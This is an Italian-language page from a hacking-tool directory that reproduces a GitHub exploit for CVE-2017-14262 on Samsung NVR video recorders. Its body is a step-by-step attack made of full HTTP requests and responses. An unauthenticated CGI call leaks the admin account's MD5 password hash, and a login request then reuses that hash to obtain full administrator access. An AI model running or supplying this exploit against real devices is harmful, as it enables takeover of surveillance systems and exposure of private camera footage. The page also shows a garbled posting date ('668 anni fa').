Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-14262 — Exploit per CVE-2017-14262 che prende di mira dispositivi Samsung NVR: estrae l'hash della password admin MD5 tramite una richiesta CGI non autenticata e accede con l'hash per ottenere accesso completo come admin. | Kitploit
Strumenti/GitHubGitHub/zzz66686/cve-2017-14262
Sicurezza Sistemi EmbeddedSicurezza IoTAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni Web
GitHubzzz66686/cve-2017-14262

CVE-2017-14262

Exploit per CVE-2017-14262 che prende di mira dispositivi Samsung NVR: estrae l'hash della password admin MD5 tramite una richiesta CGI non autenticata e accede con l'hash per ottenere accesso completo come admin.

Vedi Repository
668 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Samsung_NVR_vul

CVE-2017-14262

xfuturesec Co., Ltd

Primo, ottieni l'hash MD5 della password dell'account 'admin'.

Invia:
GET http://192.168.1.14/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0} HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: keep-alive

Ricevi:
HTTP/1.1 200 OK
Content-Type: text/html;CHARset=utf-8

{
"szUserName": "",
"szLoginPasswd": "e10adc3949ba59abbe56e057f20f883e",
"au32LoginPasswd": [13423221, 5515125, 6390751, 4733341, 12838108, 13423221, 5515125, 6390751, 10132668, 371291, 12838108, 13423221, 5515125, 10132668, 371291, 13423221, 10132668, 371291, 0, 0],
"u16UserPermissionCnt": 1,
"u8UserRole": 0,
"u8UserBasePermission": 255,
"u16UserExtralPermissionCnt": 1,
"u32UserLivePermission": [4294967295],
"u32UserPTZPermission": [4294967295],
"u32UserVODPermission": [4294967295],
"u32UserRecordPermission": [4294967295],
"u32UserLocalBackup": [4294967295], "code": 0,
"success": true
}

"szLoginPasswd": "e10adc3949ba59abbe56e057f20f883e" è l'hash MD5 della password dell'account 'admin'.

Ora abbiamo l'hash MD5 della password.

Secondo, effettua l'accesso al dispositivo con quell'hash MD5.

Invia:

POST http://192.168.1.100/cgi-bin/main-cgi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Referer: http://192.168.1.100/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 246
DNT: 1
Host: 192.168.1.100
Pragma: no-cache

lLan=0&szUserName=admin&szUserPasswd=e10adc3949ba59abbe56e057f20f883e&szUserPasswdEx=%5B6477625%2C24215867%2C12838108%2C11382568%2C7503741%2C7198498%2C24215867%2C7503741%2C7198498%2C23345327%2C7198498%2C10192199%2C23345327%2C7198498%2C10192199%5D

szUserPasswd=e10adc3949ba59abbe56e057f20f883e è l'hash MD5 della password che abbiamo letto dal primo passo.

Ora accediamo al dispositivo con l'account 'admin'.

Scarica lo strumento